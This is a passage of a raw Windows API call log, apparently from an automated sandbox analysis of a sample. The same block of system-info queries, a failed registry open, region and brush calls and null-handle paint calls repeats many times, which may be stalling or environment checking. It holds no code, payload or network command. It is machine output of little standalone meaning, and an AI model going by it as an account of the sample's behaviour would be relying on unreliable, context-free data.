lpRect=0x18178c) returned 0 [0087.626] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.626] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.626] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x470401d0 [0087.626] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x490401cd [0087.626] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408b8 [0087.627] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408b9 [0087.627] CombineRgn (hrgnDst=0x10408b8, hrgnSrc1=0x470401d0, hrgnSrc2=0x490401cd, iMode=1) returned 1 [0087.627] CombineRgn (hrgnDst=0x10408b9, hrgnSrc1=0x470401d0, hrgnSrc2=0x490401cd, iMode=4) returned 2 [0087.627] CreateSolidBrush (color=0xff) returned 0x21008b7 [0087.627] CreateSolidBrush (color=0xff0000) returned 0x11008ba [0087.627] DeleteObject (ho=0x11008ba) returned 1 [0087.627] DeleteObject (ho=0x490401cd) returned 1 [0087.627] DeleteObject (ho=0x470401d0) returned 1 [0087.627] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.627] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.627] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.627] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.627] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.627] BeginPath (hdc=0x0) returned 0 [0087.627] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.627] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.627] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.627] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.627] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.627] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.627] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.627] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.627] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4a0401cd [0087.627] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x480401d0 [0087.627] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408bb [0087.627] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408bc [0087.627] CombineRgn (hrgnDst=0x10408bb, hrgnSrc1=0x4a0401cd, hrgnSrc2=0x480401d0, iMode=1) returned 1 [0087.627] CombineRgn (hrgnDst=0x10408bc, hrgnSrc1=0x4a0401cd, hrgnSrc2=0x480401d0, iMode=4) returned 2 [0087.627] CreateSolidBrush (color=0xff) returned 0x21008ba [0087.627] CreateSolidBrush (color=0xff0000) returned 0x11008bd [0087.627] DeleteObject (ho=0x11008bd) returned 1 [0087.627] DeleteObject (ho=0x480401d0) returned 1 [0087.627] DeleteObject (ho=0x4a0401cd) returned 1 [0087.627] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.627] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.627] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.627] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.627] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.627] BeginPath (hdc=0x0) returned 0 [0087.627] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.628] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.628] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.628] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.628] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.628] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.628] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.628] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.628] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x490401d0 [0087.628] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4b0401cd [0087.628] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408be [0087.628] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408bf [0087.628] CombineRgn (hrgnDst=0x10408be, hrgnSrc1=0x490401d0, hrgnSrc2=0x4b0401cd, iMode=1) returned 1 [0087.628] CombineRgn (hrgnDst=0x10408bf, hrgnSrc1=0x490401d0, hrgnSrc2=0x4b0401cd, iMode=4) returned 2 [0087.628] CreateSolidBrush (color=0xff) returned 0x21008bd [0087.628] CreateSolidBrush (color=0xff0000) returned 0x11008c0 [0087.628] DeleteObject (ho=0x11008c0) returned 1 [0087.628] DeleteObject (ho=0x4b0401cd) returned 1 [0087.628] DeleteObject (ho=0x490401d0) returned 1 [0087.628] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.628] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.628] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.628] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.628] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.628] BeginPath (hdc=0x0) returned 0 [0087.628] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.628] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.628] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.628] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.628] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.628] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.628] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.628] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.628] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4c0401cd [0087.628] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4a0401d0 [0087.628] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408c1 [0087.628] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408c2 [0087.628] CombineRgn (hrgnDst=0x10408c1, hrgnSrc1=0x4c0401cd, hrgnSrc2=0x4a0401d0, iMode=1) returned 1 [0087.628] CombineRgn (hrgnDst=0x10408c2, hrgnSrc1=0x4c0401cd, hrgnSrc2=0x4a0401d0, iMode=4) returned 2 [0087.629] CreateSolidBrush (color=0xff) returned 0x21008c0 [0087.629] CreateSolidBrush (color=0xff0000) returned 0x11008c3 [0087.629] DeleteObject (ho=0x11008c3) returned 1 [0087.629] DeleteObject (ho=0x4a0401d0) returned 1 [0087.629] DeleteObject (ho=0x4c0401cd) returned 1 [0087.629] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.629] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.629] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.629] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.629] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.629] BeginPath (hdc=0x0) returned 0 [0087.629] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.629] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.629] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.629] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.629] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.629] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.629] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.629] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.629] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4b0401d0 [0087.629] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4d0401cd [0087.629] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408c4 [0087.629] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408c5 [0087.629] CombineRgn (hrgnDst=0x10408c4, hrgnSrc1=0x4b0401d0, hrgnSrc2=0x4d0401cd, iMode=1) returned 1 [0087.629] CombineRgn (hrgnDst=0x10408c5, hrgnSrc1=0x4b0401d0, hrgnSrc2=0x4d0401cd, iMode=4) returned 2 [0087.629] CreateSolidBrush (color=0xff) returned 0x21008c3 [0087.629] CreateSolidBrush (color=0xff0000) returned 0x11008c6 [0087.629] DeleteObject (ho=0x11008c6) returned 1 [0087.629] DeleteObject (ho=0x4d0401cd) returned 1 [0087.629] DeleteObject (ho=0x4b0401d0) returned 1 [0087.629] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.629] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.629] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.629] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.629] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.629] BeginPath (hdc=0x0) returned 0 [0087.629] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.629] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.629] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.629] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.629] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.629] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.630] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.630] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.630] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4e0401cd [0087.630] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4c0401d0 [0087.630] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408c7 [0087.630] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408c8 [0087.630] CombineRgn (hrgnDst=0x10408c7, hrgnSrc1=0x4e0401cd, hrgnSrc2=0x4c0401d0, iMode=1) returned 1 [0087.630] CombineRgn (hrgnDst=0x10408c8, hrgnSrc1=0x4e0401cd, hrgnSrc2=0x4c0401d0, iMode=4) returned 2 [0087.630] CreateSolidBrush (color=0xff) returned 0x21008c6 [0087.630] CreateSolidBrush (color=0xff0000) returned 0x11008c9 [0087.630] DeleteObject (ho=0x11008c9) returned 1 [0087.630] DeleteObject (ho=0x4c0401d0) returned 1 [0087.630] DeleteObject (ho=0x4e0401cd) returned 1 [0087.630] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.630] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.630] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.630] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.630] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.630] BeginPath (hdc=0x0) returned 0 [0087.630] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.630] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.630] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.630] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.630] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.630] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.630] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.630] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.630] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4d0401d0 [0087.630] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4f0401cd [0087.630] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ca [0087.630] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408cb [0087.630] CombineRgn (hrgnDst=0x10408ca, hrgnSrc1=0x4d0401d0, hrgnSrc2=0x4f0401cd, iMode=1) returned 1 [0087.630] CombineRgn (hrgnDst=0x10408cb, hrgnSrc1=0x4d0401d0, hrgnSrc2=0x4f0401cd, iMode=4) returned 2 [0087.630] CreateSolidBrush (color=0xff) returned 0x21008c9 [0087.630] CreateSolidBrush (color=0xff0000) returned 0x11008cc [0087.630] DeleteObject (ho=0x11008cc) returned 1 [0087.630] DeleteObject (ho=0x4f0401cd) returned 1 [0087.630] DeleteObject (ho=0x4d0401d0) returned 1 [0087.630] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.631] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.631] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.631] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.631] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.631] BeginPath (hdc=0x0) returned 0 [0087.631] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.631] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.631] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.631] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.631] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.631] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.631] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.631] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.631] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x500401cd [0087.631] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4e0401d0 [0087.631] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408cd [0087.631] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408ce [0087.631] CombineRgn (hrgnDst=0x10408cd, hrgnSrc1=0x500401cd, hrgnSrc2=0x4e0401d0, iMode=1) returned 1 [0087.631] CombineRgn (hrgnDst=0x10408ce, hrgnSrc1=0x500401cd, hrgnSrc2=0x4e0401d0, iMode=4) returned 2 [0087.631] CreateSolidBrush (color=0xff) returned 0x21008cc [0087.631] CreateSolidBrush (color=0xff0000) returned 0x11008cf [0087.631] DeleteObject (ho=0x11008cf) returned 1 [0087.631] DeleteObject (ho=0x4e0401d0) returned 1 [0087.631] DeleteObject (ho=0x500401cd) returned 1 [0087.631] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.631] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.631] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.631] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.631] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.631] BeginPath (hdc=0x0) returned 0 [0087.631] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.631] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.631] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.631] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.631] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.631] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.631] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.631] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.632] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4f0401d0 [0087.632] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x510401cd [0087.632] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408d0 [0087.632] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408d1 [0087.632] CombineRgn (hrgnDst=0x10408d0, hrgnSrc1=0x4f0401d0, hrgnSrc2=0x510401cd, iMode=1) returned 1 [0087.632] CombineRgn (hrgnDst=0x10408d1, hrgnSrc1=0x4f0401d0, hrgnSrc2=0x510401cd, iMode=4) returned 2 [0087.632] CreateSolidBrush (color=0xff) returned 0x21008cf [0087.632] CreateSolidBrush (color=0xff0000) returned 0x11008d2 [0087.632] DeleteObject (ho=0x11008d2) returned 1 [0087.632] DeleteObject (ho=0x510401cd) returned 1 [0087.632] DeleteObject (ho=0x4f0401d0) returned 1 [0087.632] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.632] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.632] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.632] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.632] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.632] BeginPath (hdc=0x0) returned 0 [0087.632] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.632] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.632] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.632] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.632] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.632] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.632] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.632] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.632] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x520401cd [0087.632] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x500401d0 [0087.632] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408d3 [0087.632] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10408d4 [0087.632] CombineRgn (hrgnDst=0x10408d3, hrgnSrc1=0x520401cd, hrgnSrc2=0x500401d0, iMode=1) returned 1 [0087.632] CombineRgn (hrgnDst=0x10408d4, hrgnSrc1=0x520401cd, hrgnSrc2=0x500401d0, iMode=4) returned 2 [0087.632] CreateSolidBrush (color=0xff) returned 0x21008d2 